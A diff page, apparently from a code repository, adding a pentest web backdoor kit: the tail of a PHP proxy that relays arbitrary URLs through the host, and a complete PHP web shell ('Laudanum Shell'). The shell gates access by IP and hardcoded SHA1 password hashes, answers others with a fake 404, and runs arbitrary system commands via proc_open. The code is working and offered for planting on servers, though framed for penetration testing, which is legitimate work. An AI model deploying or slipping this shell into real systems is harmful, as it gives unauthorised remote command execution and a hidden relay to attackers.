|
||||||
|
function buildurl ($u) {
|
||||||
|
// build the url from the url array
|
||||||
|
// this is used because the built in function isn't
|
||||||
|
// avilable in all installs of php
|
||||||
|
if (!isset($u["host"])) { return null; }
|
||||||
|
|
||||||
|
$s = isset($u["scheme"]) ? $u["scheme"] : "http";
|
||||||
|
$s .= "://" . $u["host"];
|
||||||
|
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
|
||||||
|
$s .= isset($u["path"]) ? $u["path"] : "/";
|
||||||
|
$s .= isset($u["query"]) ? "?" . $u["query"] : "";
|
||||||
|
$s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
|
||||||
|
return $s;
|
||||||
|
}
|
||||||
|
|
||||||
|
function buildurlpath ($u) {
|
||||||
|
//gets the full url and attempts to remove the file at the end of the url
|
||||||
|
// e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
|
||||||
|
if (!isset($u["host"])) { return null; }
|
||||||
|
|
||||||
|
$s = isset($u["scheme"])? $u["scheme"] : "http";
|
||||||
|
$s .= "://" . $u["host"];
|
||||||
|
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
|
||||||
|
|
||||||
|
$path = isset($u["path"]) ? $u["path"] : "/";
|
||||||
|
// is the last portion of the path a file or a dir?
|
||||||
|
// assume if there is a . it is a file
|
||||||
|
// if it ends in a / then it is a dir
|
||||||
|
// if neither, than assume dir
|
||||||
|
$dirs = explode("/", $path);
|
||||||
|
$last = $dirs[count($dirs) - 1];
|
||||||
|
if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
|
||||||
|
// its a file, remove the last chunk
|
||||||
|
$path = substr($path, 0, -1 * strlen($last));
|
||||||
|
}
|
||||||
|
|
||||||
|
$s .= $path;
|
||||||
|
return $s;
|
||||||
|
}
|
||||||
|
|
||||||
|
function getfilename ($u) {
|
||||||
|
// returns the file name
|
||||||
|
// e.g. http://blah.com/dir/file.ext returns file.ext
|
||||||
|
// technically, it is the last portion of the url, so there is a potential
|
||||||
|
// for a problem if a http://blah.com/dir returns a file
|
||||||
|
$s = explode("/", $u["path"]);
|
||||||
|
return $s[count($s) - 1];
|
||||||
|
}
|
||||||
|
|
||||||
|
function getcontenttype ($headers) {
|
||||||
|
// gets the content type
|
||||||
|
foreach($headers as $h) {
|
||||||
|
if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
|
||||||
|
return $out[1][0];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function getcontentencoding ($headers) {
|
||||||
|
foreach ($headers as $h) {
|
||||||
|
if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
|
||||||
|
return $out[1][0];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function removeheader($header, $headers) {
|
||||||
|
foreach (array_keys($headers) as $key) {
|
||||||
|
if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
|
||||||
|
unset($headers[$key]);
|
||||||
|
return $headers;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function rewritecookies($headers) {
|
||||||
|
// removes the path and domain from cookies
|
||||||
|
for ($i = 0; $i < count($headers); $i++) {
|
||||||
|
if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
|
||||||
|
$headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
|
||||||
|
$headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return $headers;
|
||||||
|
}
|
||||||
|
|
||||||
|
function getsessionid($headers) {
|
||||||
|
for ($i = 0; $i < count($headers); $i++) {
|
||||||
|
if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
|
||||||
|
return $out[1][0];
|
||||||
|
}
|
||||||
|
return "0";
|
||||||
|
}
|
||||||
|
|
||||||
|
function compatible_gzinflate($gzData) {
|
||||||
|
if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
|
||||||
|
$i = 10;
|
||||||
|
$flg = ord( substr($gzData, 3, 1) );
|
||||||
|
if ( $flg > 0 ) {
|
||||||
|
if ( $flg & 4 ) {
|
||||||
|
list($xlen) = unpack('v', substr($gzData, $i, 2) );
|
||||||
|
$i = $i + 2 + $xlen;
|
||||||
|
}
|
||||||
|
if ( $flg & 8 )
|
||||||
|
$i = strpos($gzData, "\0", $i) + 1;
|
||||||
|
if ( $flg & 16 )
|
||||||
|
$i = strpos($gzData, "\0", $i) + 1;
|
||||||
|
if ( $flg & 2 )
|
||||||
|
$i = $i + 2;
|
||||||
|
}
|
||||||
|
return @gzinflate( substr($gzData, $i, -8) );
|
||||||
|
} else {
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
function rewrite ($d, $u) {
|
||||||
|
$r = $d;
|
||||||
|
//rewrite images and links - absolute reference
|
||||||
|
$r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
|
||||||
|
//rewrite images and links - hard linked
|
||||||
|
$r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
|
||||||
|
//rewrite images and links - relative reference
|
||||||
|
$r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
|
||||||
|
|
||||||
|
|
||||||
|
//rewrite form - absolute reference
|
||||||
|
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r);
|
||||||
|
//rewrite form - hard linked
|
||||||
|
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r);
|
||||||
|
//rewrite form - relative reference
|
||||||
|
$r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r);
|
||||||
|
return $r;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Initialize some variables we need again and again. */
|
||||||
|
$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : "";
|
||||||
|
if ($url == "") {
|
||||||
|
$url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : "";
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($url == "") {
|
||||||
|
?>
|
||||||
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||||
|
"http://www.w3.org/TR/html4/strict.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum PHP Proxy</title>
|
||||||
|
<link rel="stylesheet" href="style.css" type="text/css">
|
||||||
|
|
||||||
|
<script type="text/javascript">
|
||||||
|
function init() {
|
||||||
|
document.proxy.url.focus();
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body onload="init()">
|
||||||
|
|
||||||
|
<h1>Laudanum PHP Proxy</h1>
|
||||||
|
|
||||||
|
<form method="GET" name="proxy">
|
||||||
|
<input type="text" name="laudurl" size="70">
|
||||||
|
|
||||||
|
</form>
|
||||||
|
<hr>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
} else {
|
||||||
|
|
||||||
|
$url_c = geturlarray($url);
|
||||||
|
$params = array_merge($_GET, $_POST);
|
||||||
|
|
||||||
|
//don't pass throught the parameter we are using
|
||||||
|
unset($params["laudurl"]);
|
||||||
|
|
||||||
|
//create the query or post parameters
|
||||||
|
$query = http_build_query($params);
|
||||||
|
if ($query != "") {
|
||||||
|
$url_c["query"] = $query;
|
||||||
|
}
|
||||||
|
|
||||||
|
//get the files
|
||||||
|
$fp = fopen(buildurl($url_c), "rb");
|
||||||
|
|
||||||
|
// use the headers, except the response code which is popped off the array
|
||||||
|
$headers = $http_response_header;
|
||||||
|
// pop
|
||||||
|
array_shift($headers);
|
||||||
|
|
||||||
|
// fix cookies
|
||||||
|
$headers = rewritecookies($headers);
|
||||||
|
|
||||||
|
$ctype = getcontenttype($headers);
|
||||||
|
$cencoding = getcontentencoding($headers);
|
||||||
|
|
||||||
|
// we will remove gzip encoding later, but we need to remove the header now
|
||||||
|
// before it is added to the response.
|
||||||
|
if ($cencoding == "gzip")
|
||||||
|
$headers = removeheader("Content-Encoding", $headers);
|
||||||
|
|
||||||
|
// set headers for response to client
|
||||||
|
if (preg_match("/text|image/", $ctype)) {
|
||||||
|
header_remove();
|
||||||
|
// the number of headers can change due to replacement
|
||||||
|
$i = 0;
|
||||||
|
while ($i < count($headers)) {
|
||||||
|
if (strpos($headers[$i], "Set-Cookie:") == false)
|
||||||
|
// replace headers
|
||||||
|
header($headers[$i], true);
|
||||||
|
else
|
||||||
|
// if it is the first cookie, replace all the others. Otherwise add
|
||||||
|
header($headers[$i], false);
|
||||||
|
$i++;
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
header("Content-Disposition: attachment; filename=" . getfilename($url_c));
|
||||||
|
}
|
||||||
|
|
||||||
|
// get data
|
||||||
|
if (preg_match("/text/",$ctype)) { //text
|
||||||
|
//it is a text format: html, css, js
|
||||||
|
$data = "";
|
||||||
|
while (!feof($fp)) {
|
||||||
|
$data .= fgets($fp, 4096);
|
||||||
|
}
|
||||||
|
|
||||||
|
// uncompress it so it can be rewritten
|
||||||
|
if ($cencoding == "gzip")
|
||||||
|
$data = compatible_gzinflate($data);
|
||||||
|
|
||||||
|
// rewrite all the links and such
|
||||||
|
echo rewrite($data, $url_c);
|
||||||
|
|
||||||
|
} else {
|
||||||
|
// binary format or something similar, let it go through
|
||||||
|
fpassthru($fp);
|
||||||
|
fclose($fp);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
?>
|
||||||
409
Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php
Normal file
409
Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php
Normal file
@@ -0,0 +1,409 @@
|
|||||||
|
<?php
|
||||||
|
/* *****************************************************************************
|
||||||
|
***
|
||||||
|
*** Laudanum Project
|
||||||
|
*** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
***
|
||||||
|
*** More information is available at:
|
||||||
|
*** http://laudanum.secureideas.net
|
||||||
|
*** laudanum@secureideas.net
|
||||||
|
***
|
||||||
|
*** Project Leads:
|
||||||
|
*** Kevin Johnson <kjohnson@secureideas.net>
|
||||||
|
*** Tim Medin <tim@securitywhole.com>
|
||||||
|
***
|
||||||
|
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
***
|
||||||
|
*** This file provides shell access to the system. It is built based on the 2.1
|
||||||
|
*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler
|
||||||
|
*** <mgeisler[at]mgeisler.net>
|
||||||
|
***
|
||||||
|
*** Updated by Tim Medin
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
*** This program is free software; you can redistribute it and/or
|
||||||
|
*** modify it under the terms of the GNU General Public License
|
||||||
|
*** as published by the Free Software Foundation; either version 2
|
||||||
|
*** of the License, or (at your option) any later version.
|
||||||
|
***
|
||||||
|
*** This program is distributed in the hope that it will be useful,
|
||||||
|
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
*** GNU General Public License for more details.
|
||||||
|
***
|
||||||
|
*** You can get a copy of the GNU General Public License from this
|
||||||
|
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||||
|
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
***
|
||||||
|
***************************************************************************** */
|
||||||
|
|
||||||
|
// ***************** Config entries below ***********************
|
||||||
|
|
||||||
|
// IPs are enterable as individual addresses TODO: add CIDR support
|
||||||
|
$allowedIPs = array("192.168.1.55", "12.2.2.2");
|
||||||
|
|
||||||
|
# format is "username" => "password"
|
||||||
|
# password is generated using sha1sum as shown below (don't forget the -n, KEVIN!)
|
||||||
|
# echo -n Password1 | sha1sum
|
||||||
|
$users = array("kevin" => "b441ac06613fc8d63795be9ad0beaf55011936ac", "tim" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3", "yomamma" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3");
|
||||||
|
|
||||||
|
# *********** No editable content below this line **************
|
||||||
|
|
||||||
|
$allowed = 0;
|
||||||
|
foreach ($allowedIPs as $IP) {
|
||||||
|
if ($_SERVER["REMOTE_ADDR"] == $IP)
|
||||||
|
$allowed = 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($allowed == 0) {
|
||||||
|
header("HTTP/1.0 404 Not Found");
|
||||||
|
die();
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||||
|
* errors, unless they have been suppressed with the @-operator. */
|
||||||
|
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||||
|
/* The @-opertor (used with chdir() below) temporarely makes
|
||||||
|
* error_reporting() return zero, and we don't want to die in that case.
|
||||||
|
* We do note the error in the output, though. */
|
||||||
|
if (error_reporting() == 0) {
|
||||||
|
$_SESSION['output'] .= $errstr . "\n";
|
||||||
|
} else {
|
||||||
|
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||||
|
"http://www.w3.org/TR/html4/strict.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum PHP Shell Access</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Fatal Error!</h1>
|
||||||
|
<p><b>' . $errstr . '</b></p>
|
||||||
|
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||||
|
|
||||||
|
<hr>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a
|
||||||
|
href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
set_error_handler('error_handler');
|
||||||
|
|
||||||
|
|
||||||
|
function logout() {
|
||||||
|
$_SESSION = array('authenticated' => false);
|
||||||
|
if (isset($_COOKIE[session_name()]))
|
||||||
|
setcookie(session_name(), '', time()-42000, '/');
|
||||||
|
session_destroy();
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function stripslashes_deep($value) {
|
||||||
|
if (is_array($value))
|
||||||
|
return array_map('stripslashes_deep', $value);
|
||||||
|
else
|
||||||
|
return stripslashes($value);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (get_magic_quotes_gpc())
|
||||||
|
$_POST = stripslashes_deep($_POST);
|
||||||
|
|
||||||
|
/* Initialize some variables we need again and again. */
|
||||||
|
$username = isset($_POST['username']) ? $_POST['username'] : '';
|
||||||
|
$password = isset($_POST['password']) ? $_POST['password'] : '';
|
||||||
|
$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
|
||||||
|
|
||||||
|
$command = isset($_POST['command']) ? $_POST['command'] : '';
|
||||||
|
$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
|
||||||
|
$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
|
||||||
|
|
||||||
|
|
||||||
|
///* Default settings --- these settings should always be set to something. */
|
||||||
|
//$default_settings = array('home-directory' => '.');
|
||||||
|
|
||||||
|
///* Merge settings. */
|
||||||
|
//$ini['settings'] = array_merge($default_settings, $ini['settings']);
|
||||||
|
|
||||||
|
|
||||||
|
session_start();
|
||||||
|
|
||||||
|
/* Delete the session data if the user requested a logout. This leaves the
|
||||||
|
* session cookie at the user, but this is not important since we
|
||||||
|
* authenticates on $_SESSION['authenticated']. */
|
||||||
|
if (isset($_POST['logout']))
|
||||||
|
logout();
|
||||||
|
|
||||||
|
///* Attempt authentication. */
|
||||||
|
//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
|
||||||
|
// isset($ini['users'][$username])) {
|
||||||
|
// if (strchr($ini['users'][$username], ':') === false) {
|
||||||
|
// // No seperator found, assume this is a password in clear text.
|
||||||
|
// $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
|
||||||
|
// } else {
|
||||||
|
// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
|
||||||
|
// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
|
||||||
|
// }
|
||||||
|
//}
|
||||||
|
|
||||||
|
/* Attempt authentication. */
|
||||||
|
if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
|
||||||
|
$_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));
|
||||||
|
|
||||||
|
/* Enforce default non-authenticated state if the above code didn't set it
|
||||||
|
* already. */
|
||||||
|
if (!isset($_SESSION['authenticated']))
|
||||||
|
$_SESSION['authenticated'] = false;
|
||||||
|
|
||||||
|
if ($_SESSION['authenticated']) {
|
||||||
|
/* Initialize the session variables. */
|
||||||
|
if (empty($_SESSION['cwd'])) {
|
||||||
|
$_SESSION['cwd'] = '.';
|
||||||
|
$_SESSION['history'] = array();
|
||||||
|
$_SESSION['output'] = '';
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!empty($command)) {
|
||||||
|
/* Save the command for late use in the JavaScript. If the command is
|
||||||
|
* already in the history, then the old entry is removed before the
|
||||||
|
* new entry is put into the list at the front. */
|
||||||
|
if (($i = array_search($command, $_SESSION['history'])) !== false)
|
||||||
|
unset($_SESSION['history'][$i]);
|
||||||
|
|
||||||
|
array_unshift($_SESSION['history'], $command);
|
||||||
|
|
||||||
|
/* Now append the commmand to the output. */
|
||||||
|
$_SESSION['output'] .= '$ ' . $command . "\n";
|
||||||
|
|
||||||
|
/* Initialize the current working directory. */
|
||||||
|
if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
|
||||||
|
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
|
||||||
|
} elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
|
||||||
|
/* The current command is a 'cd' command which we have to handle
|
||||||
|
* as an internal shell command. */
|
||||||
|
|
||||||
|
if ($regs[1]{0} == '/') {
|
||||||
|
/* Absolute path, we use it unchanged. */
|
||||||
|
$new_dir = $regs[1];
|
||||||
|
} else {
|
||||||
|
/* Relative path, we append it to the current working
|
||||||
|
* directory. */
|
||||||
|
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Transform '/./' into '/' */
|
||||||
|
while (strpos($new_dir, '/./') !== false)
|
||||||
|
$new_dir = str_replace('/./', '/', $new_dir);
|
||||||
|
|
||||||
|
/* Transform '//' into '/' */
|
||||||
|
while (strpos($new_dir, '//') !== false)
|
||||||
|
$new_dir = str_replace('//', '/', $new_dir);
|
||||||
|
|
||||||
|
/* Transform 'x/..' into '' */
|
||||||
|
while (preg_match('|/\.\.(?!\.)|', $new_dir))
|
||||||
|
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
|
||||||
|
|
||||||
|
if ($new_dir == '') $new_dir = '/';
|
||||||
|
|
||||||
|
/* Try to change directory. */
|
||||||
|
if (@chdir($new_dir)) {
|
||||||
|
$_SESSION['cwd'] = $new_dir;
|
||||||
|
} else {
|
||||||
|
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
||||||
|
}
|
||||||
|
|
||||||
|
} elseif (trim($command) == 'exit') {
|
||||||
|
logout();
|
||||||
|
} else {
|
||||||
|
|
||||||
|
/* The command is not an internal command, so we execute it after
|
||||||
|
* changing the directory and save the output. */
|
||||||
|
chdir($_SESSION['cwd']);
|
||||||
|
|
||||||
|
// We canot use putenv() in safe mode.
|
||||||
|
if (!ini_get('safe_mode')) {
|
||||||
|
// Advice programs (ls for example) of the terminal size.
|
||||||
|
putenv('ROWS=' . $rows);
|
||||||
|
putenv('COLUMNS=' . $columns);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Alias expansion. */
|
||||||
|
$length = strcspn($command, " \t");
|
||||||
|
$token = substr($command, 0, $length);
|
||||||
|
if (isset($ini['aliases'][$token]))
|
||||||
|
$command = $ini['aliases'][$token] . substr($command, $length);
|
||||||
|
|
||||||
|
$io = array();
|
||||||
|
$p = proc_open($command,
|
||||||
|
array(1 => array('pipe', 'w'),
|
||||||
|
2 => array('pipe', 'w')),
|
||||||
|
$io);
|
||||||
|
|
||||||
|
/* Read output sent to stdout. */
|
||||||
|
while (!feof($io[1])) {
|
||||||
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
|
||||||
|
ENT_COMPAT, 'UTF-8');
|
||||||
|
}
|
||||||
|
/* Read output sent to stderr. */
|
||||||
|
while (!feof($io[2])) {
|
||||||
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
|
||||||
|
ENT_COMPAT, 'UTF-8');
|
||||||
|
}
|
||||||
|
|
||||||
|
fclose($io[1]);
|
||||||
|
fclose($io[2]);
|
||||||
|
proc_close($p);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Build the command history for use in the JavaScript */
|
||||||
|
if (empty($_SESSION['history'])) {
|
||||||
|
$js_command_hist = '""';
|
||||||
|
} else {
|
||||||
|
$escaped = array_map('addslashes', $_SESSION['history']);
|
||||||
|
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||||
|
"http://www.w3.org/TR/html4/strict.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum Shell</title>
|
||||||
|
<link rel="stylesheet" href="style.css" type="text/css">
|
||||||
|
|
||||||
|
<script type="text/javascript">
|
||||||
|
<?php if ($_SESSION['authenticated']) { ?>
|
||||||
|
|
||||||
|
var current_line = 0;
|
||||||
|
var command_hist = new Array(<?php echo $js_command_hist ?>);
|
||||||
|
var last = 0;
|
||||||
|
|
||||||
|
function key(e) {
|
||||||
|
if (!e) var e = window.event;
|
||||||
|
|
||||||
|
if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
||||||
|
command_hist[current_line] = document.shell.command.value;
|
||||||
|
current_line++;
|
||||||
|
document.shell.command.value = command_hist[current_line];
|
||||||
|
}
|
||||||
|
|
||||||
|
if (e.keyCode == 40 && current_line > 0) {
|
||||||
|
command_hist[current_line] = document.shell.command.value;
|
||||||
|
current_line--;
|
||||||
|
document.shell.command.value = command_hist[current_line];
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
function init() {
|
||||||
|
document.shell.setAttribute("autocomplete", "off");
|
||||||
|
document.shell.output.scrollTop = document.shell.output.scrollHeight;
|
||||||
|
document.shell.command.focus();
|
||||||
|
}
|
||||||
|
|
||||||
|
<?php } else { ?>
|
||||||
|
|
||||||
|
function init() {
|
||||||
|
document.shell.username.focus();
|
||||||
|
}
|
||||||
|
|
||||||
|
<?php } ?>
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body onload="init()">
|
||||||
|
|
||||||
|
<h1>Laudanum Shell</h1>
|
||||||
|
|
||||||
|
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
|
||||||
|
|
||||||
|
<?php
|
||||||
|
if (!$_SESSION['authenticated']) {
|
||||||
|
/* Genereate a new nounce every time we preent the login page. This binds
|
||||||
|
* each login to a unique hit on the server and prevents the simple replay
|
||||||
|
* attack where one uses the back button in the browser to replay the POST
|
||||||
|
* data from a login. */
|
||||||
|
$_SESSION['nounce'] = mt_rand();
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
<fieldset>
|
||||||
|
<legend>Authentication</legend>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
if (!empty($username))
|
||||||
|
echo ' <p class="error">Login failed, please try again:</p>' . "\n";
|
||||||
|
else
|
||||||
|
echo " <p>Please login:</p>\n";
|
||||||
|
?>
|
||||||
|
|
||||||
|
<p>Username: <input name="username" type="text" value="<?php echo $username
|
||||||
|
?>"></p>
|
||||||
|
|
||||||
|
<p>Password: <input name="password" type="password"></p>
|
||||||
|
|
||||||
|
<p><input type="submit" value="Login"></p>
|
||||||
|
|
||||||
|
<input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>">
|
||||||
|
|
||||||
|
</fieldset>
|
||||||
|
|
||||||
|
<?php } else { /* Authenticated. */ ?>
|
||||||
|
|
||||||
|
<fieldset>
|
||||||
|
<legend>Current Working Directory: <code><?php
|
||||||
|
echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8');
|
||||||
|
?></code></legend>
|
||||||
|
|
||||||
|
|
||||||
|
<div id="terminal">
|
||||||
|
<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>">
|
||||||
|
<?php
|
||||||
|
$lines = substr_count($_SESSION['output'], "\n");
|
||||||
|
$padding = str_repeat("\n", max(0, $rows+1 - $lines));
|
||||||
|
echo rtrim($padding . $_SESSION['output']);
|
||||||
|
?>
|
||||||
|
</textarea>
|
||||||
|
<p id="prompt">
|
||||||
|
$ <input name="command" type="text"
|
||||||
|
onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1">
|
||||||
|
</p>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<p>
|
||||||
|
<span style="float: right">Size: <input type="text" name="rows" size="2"
|
||||||
|
maxlength="3" value="<?php echo $rows ?>"> × <input type="text"
|
||||||
|
name="columns" size="2" maxlength="3" value="<?php echo $columns
|
||||||
|
?>"></span>
|
||||||
|
|
||||||
|
<input type="submit" value="Execute Command">
|
||||||
|
<input type="submit" name="logout" value="Logout">
|
||||||
|
</p>
|
||||||
|
|
||||||
|
</fieldset>
|
||||||
|
|
||||||
|
<?php } ?>
|
||||||
|
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
<hr/>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Updated by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
Reference in New Issue
Block a user